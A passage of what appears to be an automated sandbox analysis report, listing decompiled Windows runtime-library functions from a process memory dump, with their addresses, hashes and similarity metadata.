				if(E0496F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04954620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                  0x0493f35d
                                                                  0x0493f361
                                                                  0x0493f367
                                                                  0x0493f372
                                                                  0x0493f38c
                                                                  0x0493f38c
                                                                  0x0493f394

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                  • Instruction ID: b54f85e5750852e1020fa4be85a48993d12f0e210f9656df1e001574a21bbca2
                                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                  • Instruction Fuzzy Hash: 8DE0DF32A42118BBDB31AADD9E05FAABBACDB88BA1F1001A5F904D7164D564AE40C7D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494FF60, Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0494FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x49111a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04A088F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04950050(_t14);
				}
			}










                                                                  0x0494ff66
                                                                  0x0494ff6b
                                                                  0x00000000
                                                                  0x0494ff8f
                                                                  0x00000000
                                                                  0x0494ff8f

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d52215a93728e841e99484865d3dcf9854453d2a442160b131a618f9987c7cf8
                                                                  • Instruction ID: 5f2e8bc39ab87deef748d89229c958311e22644f81cc22350e09fc4e492c764b
                                                                  • Opcode Fuzzy Hash: d52215a93728e841e99484865d3dcf9854453d2a442160b131a618f9987c7cf8
                                                                  • Instruction Fuzzy Hash: D0E026B0685345DFE734DF61E140F26779C9FC2725F1984BDE4084B902E621F880C22A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049C41E8, Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E049C41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4a108f0);
				_t5 = E0498D08C(__ebx, __edi, __esi);
				if( *0x4a287ec == 0) {
					E0494EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4a287ec == 0) {
						 *0x4a287f0 = 0x4a287ec;
						 *0x4a287ec = 0x4a287ec;
						 *0x4a287e8 = 0x4a287e4;
						 *0x4a287e4 = 0x4a287e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L049C4248();
				}
				return E0498D0D1(_t5);
			}





                                                                  0x049c41e8
                                                                  0x049c41ea
                                                                  0x049c41ef
                                                                  0x049c41fb
                                                                  0x049c4206
                                                                  0x049c420b
                                                                  0x049c4216
                                                                  0x049c421d
                                                                  0x049c4222
                                                                  0x049c422c
                                                                  0x049c4231
                                                                  0x049c4231
                                                                  0x049c4236
                                                                  0x049c423d
                                                                  0x049c423d
                                                                  0x049c4247

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dd1d4a58d4b24755a240e29d60fc0ea95677e4a8b3bf1cff10d7a8abf4ced34f
                                                                  • Instruction ID: 7045ff4e483632dc0d9e6111b3ad6c7766e91f6051886804c034980b17ac19d6
                                                                  • Opcode Fuzzy Hash: dd1d4a58d4b24755a240e29d60fc0ea95677e4a8b3bf1cff10d7a8abf4ced34f
                                                                  • Instruction Fuzzy Hash: E7F0F8B45127009EEB61FF6E960572436A4F7A4225F00432DE10086284C73D6982EF12
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049ED380, Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049ED380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0493E8B0(__ecx, _a4, 0xfff);
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                  0x049ed38a
                                                                  0x049ed39b
                                                                  0x049ed3b1
                                                                  0x00000000
                                                                  0x049ed3b6
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction ID: a5e84290dc127321cb615f0322bc9760d413988934f6568b8edebe04e3450ba2
                                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction Fuzzy Hash: E8E0C231284205BBEB225E44CC00F79BB5ADB807A9F204431FE085AAA0C675BD91E6C4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0496A185, Relevance: .0, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0496A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4a267e4 >= 0xa) {
					if(_t5 < 0x4a26800 || _t5 >= 0x4a26900) {
						return L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04950010(0x4a267e0, _t5);
				}
			}





                                                                  0x0496a190
                                                                  0x0496a1a6
                                                                  0x0496a1c2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0496a192
                                                                  0x0496a192
                                                                  0x0496a19f
                                                                  0x0496a19f

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1105d4577ae3dfbed16c263bcd0be059f75fcfd5f389d56489326e206bd89746
                                                                  • Instruction ID: 7699e57a0641b351f80f5db1f9b05cd5340a8da20348f0e8c5587da3ab7e69ce
                                                                  • Opcode Fuzzy Hash: 1105d4577ae3dfbed16c263bcd0be059f75fcfd5f389d56489326e206bd89746
                                                                  • Instruction Fuzzy Hash: D2D05EB11620906AF62DA758BF54F262212E7C5718F314C7DF2076A9A0DE64FCD5E608
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049616E0, Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049616E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04961710(0x4a267e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04954620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                  0x049616e8
                                                                  0x049616ef
                                                                  0x049616f3
                                                                  0x049616fe
                                                                  0x00000000
                                                                  0x04961700
                                                                  0x0496170d
                                                                  0x0496170d
                                                                  0x049616f2
                                                                  0x049616f2
                                                                  0x049616f2
                                                                  0x049616f2

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 436e1d61d483ce42f4e97bc8aa292e997966637ea8ad921faf5e3c17d6c62fe6
                                                                  • Instruction ID: c14c559d650acc2255db98b7d85ffd642b50554570c20ac3f18c44e939416379
                                                                  • Opcode Fuzzy Hash: 436e1d61d483ce42f4e97bc8aa292e997966637ea8ad921faf5e3c17d6c62fe6
                                                                  • Instruction Fuzzy Hash: 17D0A77110114056FA2D9B149806B142256DBC0789F38007CF507594D0CFA0FCA2E448
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B53CA, Relevance: .0, Instructions: 16COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049B53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0494EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                  0x049b53ca
                                                                  0x049b53ce
                                                                  0x049b53d9
                                                                  0x049b53de
                                                                  0x049b53e1
                                                                  0x049b53e1
                                                                  0x049b53e6
                                                                  0x049b53f3
                                                                  0x00000000
                                                                  0x049b53f8
                                                                  0x049b53fb

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction ID: 0d6d855927a238cf3312b6dbedd5c931d21dbbdf3f7b1e0191883f686e971f56
                                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction Fuzzy Hash: 86E0EC71944784EFDF12EB99CA50F9EB7F9FB84B54F150464A4485B761C664BD00CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049635A1, Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049635A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0494EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                  0x049635a1
                                                                  0x049635a1
                                                                  0x049635a5
                                                                  0x049635ab
                                                                  0x049635ab
                                                                  0x049635b5
                                                                  0x00000000
                                                                  0x049635c1
                                                                  0x049635b7

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                  • Instruction ID: 014b592fb82a30d62b031b38bd18882d603917b607759c2ccebb066d634df831
                                                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                  • Instruction Fuzzy Hash: 91D0A9315011809EEB21AB50C238B6833B7BB80308F582075880B07852C33A6A0AD601
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0494AAB0, Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0494AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                  0x0494aab6
                                                                  0x0494aabb
                                                                  0x0499a442
                                                                  0x00000000
                                                                  0x0499a448
                                                                  0x0499a454
                                                                  0x0499a454
                                                                  0x0494aac1
                                                                  0x0494aac1
                                                                  0x0494aac6
                                                                  0x0494aac6

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction ID: dd1fe7421fc8a204f5c4e53d0a25d5e36d4e8a7f15dab559aab830c4e1b6a782
                                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction Fuzzy Hash: 26D0E935352980CFD716CF1DC968B1573A9FB44B44FC504A0E501CBB61E62CED44CA10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049BA537, Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049BA537(intOrPtr _a4, intOrPtr _a8) {

				return L04958E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                  0x049ba553

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                  • Instruction ID: 3345b2976af6783e753c2ec39fd3eb2f2d40b8c8abfcbd81ab0f2f2e668dcc7d
                                                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                  • Instruction Fuzzy Hash: F1C01232080248BBCB12BE81CC00F067B2AEB94B60F108020BA080A5708632E970EB84
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493DB40, Relevance: .0, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0493DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04954620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                  0x0493db4d
                                                                  0x0493db54
                                                                  0x0493db5f
                                                                  0x0493db56
                                                                  0x0493db56
                                                                  0x0493db5c
                                                                  0x0493db5c

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction ID: e355eb3c688ff935ddfd961ba47ba633d2cd9507d7bb32008120af09a486a834
                                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction Fuzzy Hash: 40C08C30281A00AEEB625F20CD01B0036A5BB41B46F4400B06701DA0F0DB78E801EA00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0493AD30, Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E0493AD30(intOrPtr _a4) {

				return L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                  0x0493ad49

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction ID: 1aaf1a5d61aefd6806c1fb9ab1f2b3838de412fdc3cc6cfbbd22e3b4214934f9
                                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction Fuzzy Hash: 94C08C32080248BBC712AA85DD00F017F29E7D0B60F100020BA040A6718932E960D688
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049636CC, Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049636CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04954620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                  0x049636d2
                                                                  0x049636e8
                                                                  0x049636d4
                                                                  0x049636e5
                                                                  0x049636e5

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                  • Instruction ID: b9cf80cc61de3388477d15a40f952f1f4e2b967c5f1fd9709bfb131aead28112
                                                                  • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                  • Instruction Fuzzy Hash: FEC09B75159440FBE7255F30CD51F157258F740A65FB407747722495F0D569BC40D604
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049476E2, Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E049476E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                  0x049476e4
                                                                  0x00000000
                                                                  0x049476f8
                                                                  0x049476fd

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                  • Instruction ID: e271e68dc7dc71cf3d2d350ec0949fa243c43d1fcb45921519041843980ca6d6
                                                                  • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                  • Instruction Fuzzy Hash: 3AC08C701411885AEB2AAB88CE20F203A59AB88708F5809FCEA01094B1C368B802C208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04953A1C, Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04953A1C(intOrPtr _a4) {
				void* _t5;

				return L04954620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                  0x04953a35

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction ID: f696f0ca07cbc78f04caff0371080f1a9c95bd72ebc2ec97fed5828528dc8e91
                                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction Fuzzy Hash: EFC08C32080248BBC712AE41DC00F017B29E790B60F100020BA040A5708532ECA0DA88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04957D50, Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04957D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                  0x04957d56
                                                                  0x04957d5b
                                                                  0x04957d60
                                                                  0x04957d5d
                                                                  0x04957d5d
                                                                  0x04957d5d

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction ID: 5f7996930fb7c3480d3a6cbc1d97b26760742e5b497da901081f8f90fc038f6f
                                                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction Fuzzy Hash: C8B092343019408FCF26DF18C080B1533E8BB44A40F9400E0E800CBA20D229E9008A00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04962ACB, Relevance: .0, Instructions: 5COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04962ACB() {
				void* _t5;

				return E0494EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                  0x04962adc

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                  • Instruction ID: 2873540d1178af2cc3520cecbfb9bc8b4e8822c6008ce2ac5c6de8b217d68e6e
                                                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                  • Instruction Fuzzy Hash: 32B01232C10840CFCF02EF80C610F197331FB80750F0544A0900127930C228BC01CB40
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049CFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 53%
                                                                  			E049CFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0497CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E049C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E049C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                  0x049cfdda
                                                                  0x049cfde2
                                                                  0x049cfde5
                                                                  0x049cfdec
                                                                  0x049cfdfa
                                                                  0x049cfdff
                                                                  0x049cfe0a
                                                                  0x049cfe0f
                                                                  0x049cfe17
                                                                  0x049cfe1e
                                                                  0x049cfe19
                                                                  0x049cfe19
                                                                  0x049cfe19
                                                                  0x049cfe20
                                                                  0x049cfe21
                                                                  0x049cfe22
                                                                  0x049cfe25
                                                                  0x049cfe40

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049CFDFA
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049CFE2B
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049CFE01
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                  • API String ID: 885266447-3903918235
